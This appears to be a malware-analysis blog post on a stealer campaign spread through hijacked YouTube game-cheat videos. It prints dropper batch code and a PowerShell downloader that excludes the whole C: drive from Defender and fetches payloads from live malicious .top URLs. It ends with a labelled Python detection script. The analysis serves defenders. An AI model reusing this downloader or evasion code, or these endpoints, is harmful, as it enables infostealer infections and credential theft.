10.03.2025

Ongoing series: #1 #2 #3

youtube games cheat update

Through continued tracking of the hijacked YouTube channels, their new uploads and changed video descriptions, new malware versions from this campaign were identified after the earlier ones had been taken down by various file-hosting services (not by Google; sites.google.com and drive.google.com remain a safe home for malware of any kind).

data-setup_x32_x64.rar Archive

As one of the changes, a data-setup_x32_x64.rar archive (SHA256: b2d56dd657da4f5427ebc78c2a377fd2f4c927572362ec322237605b47eda702) was now delivered. It was once again a collection of assorted files and executables, most of them unused and without any malicious function. The only file actually executed is Setup.exe in the top-level directory, which creates and runs extract_and_run.bat.

extract_and_run.bat Script

This batch script uses the bundled 7za.exe to extract the file bin (renamed to bin.zip, password YOUR_PASSWORD) into a newly created, randomly named folder and then executes the sss.bat contained within. Relevant excerpt:

    ) else if exist bin (
        rem "bin" is the password-protected archive shipped inside the RAR
        echo Found bin, renaming to bin.zip and extracting to !randFolder!...
        ren bin bin.zip
        mkdir !randFolder!
        rem extract with the bundled 7-Zip into the randomly named folder
        7za.exe e bin.zip -pYOUR_PASSWORD -o!randFolder!
    )

    rem hand over to the next stage
    if exist !randFolder!\sss.bat (
        timeout /t 2
        start "" "!randFolder!\sss.bat"
    ) else (
        echo sss.bat not found after extraction.
    )

sss.bat, however, only serves to invoke script1.ps1 (SHA256: F06FA0E85922EF5547E8EA7E2F5969D51FA09155DCE17B081022476F3B08074F), which is located in the same folder, via PowerShell.

script1.ps1 Script

This script then generates and displays fake output to the user. In the background it additionally adds a Windows Defender exclusion for the entire system drive and downloads the instructions for the next stage.

    # exclude the whole system drive from Defender scanning
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"

    $downloadURL = "https://yaykisobakitop.top/kjlrfejkrfkrerfk3fkfrkerlkfr3ejhkRKFJKERKJFREWKJ34JK34JKDWK/xxx"
    # note: 'ApplicationData' resolves to the roaming AppData folder, despite the variable name
    $localAppDataPath = [System.Environment]::GetFolderPath('ApplicationData')

    # the request is only answered with this custom User-Agent (note the "/xevil" suffix)
    $httpClient = New-Object System.Net.WebClient
    $httpClient.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36/xevil")
    $encodedData = $httpClient.DownloadString($downloadURL)
    # the response is Base64; decoded, it yields one URL per line
    $decodedURLList = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($encodedData)).Split("`n")

After a successful request (the server only answers when the custom User-Agent header is set), the response contains the Base64-encoded URL of the final payload: https://sisiskipiskuhvostiki.top/fwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31kjhjhfhejewhljklk4l243lkfjksksd2fefwsda/uploads/EFewefwewFEW342234423234feWEEFWWefewefweffewwefEWF.php?file=123123123123.exe. This file is downloaded as well, saved under a randomly generated name in the previously determined $localAppDataPath directory and executed after a 5-second pause (most likely a delay to evade automated analysis sandboxes).

123123123123.exe Executable

The downloaded file (SHA256: D24E47EDEBBECB0A0C2389E832825412FBC563C3782556DDB89FD2A7A328331A) is an obfuscated C++ binary. The readable imports and various strings already identify it as a stealer variant. When executed, it extracts configuration and stored data from browsers such as Firefox and Chrome. In addition, the creation and use of a mutex named approve_april can be observed. Together with the domain used to download the payload, this strongly suggests a Vidar Stealer.
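Added here as a detection example (not code from the original post or from the analysed campaign): three rules for the indicators described in the script1.ps1 and 123123123123.exe sections, the drive-root Defender exclusion, the "/xevil" User-Agent suffix and the approve_april mutex, run over constructed sample events; the event field names are assumptions.

```python
import re

# One rule = (name, event field, pattern). Each pattern targets one indicator
# described above; the event field names are assumptions for this example.
RULES = [
    # script1.ps1 excludes the whole system drive from Defender scanning;
    # only drive-root paths (C:\, D:) are flagged, subfolder exclusions are not
    ("defender_drive_root_exclusion", "ScriptBlockText",
     re.compile(r"""Add-MpPreference\b.*-ExclusionPath\s+['"]?[A-Za-z]:\\?(?=['"\s]|$)""", re.I)),
    # the downloader appends "/xevil" to an otherwise ordinary Chrome User-Agent
    ("xevil_user_agent_suffix", "UserAgent", re.compile(r"/xevil\s*$")),
    # the final payload creates the mutex approve_april
    ("mutex_approve_april", "MutexName", re.compile(r"^approve_april$")),
]


def match_event(event):
    """Return the names of all rules whose field is present in the event and matches."""
    hits = []
    for name, field, pattern in RULES:
        value = event.get(field)
        if isinstance(value, str) and pattern.search(value):
            hits.append(name)
    return hits


def scan_events(events):
    """Return [(event index, rule name), ...] for every match, in input order."""
    return [(i, name) for i, ev in enumerate(events) for name in match_event(ev)]


# Constructed sample events, loosely modelled on PowerShell script-block
# logging (event 4104), a web-proxy access log and a sandbox mutex report.
SAMPLE_EVENTS = [
    {"source": "PowerShell/4104",
     "ScriptBlockText": "powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"source": "PowerShell/4104",  # benign-looking subfolder exclusion, must not match
     "ScriptBlockText": "Add-MpPreference -ExclusionPath 'C:\\Program Files\\Backup'"},
    {"source": "proxy",
     "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36/xevil"},
    {"source": "proxy",
     "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"},
    {"source": "sandbox", "MutexName": "approve_april"},
]

if __name__ == "__main__":
    for idx, rule in scan_events(SAMPLE_EVENTS):
        print(f"event {idx} ({SAMPLE_EVENTS[idx]['source']}): {rule}")
```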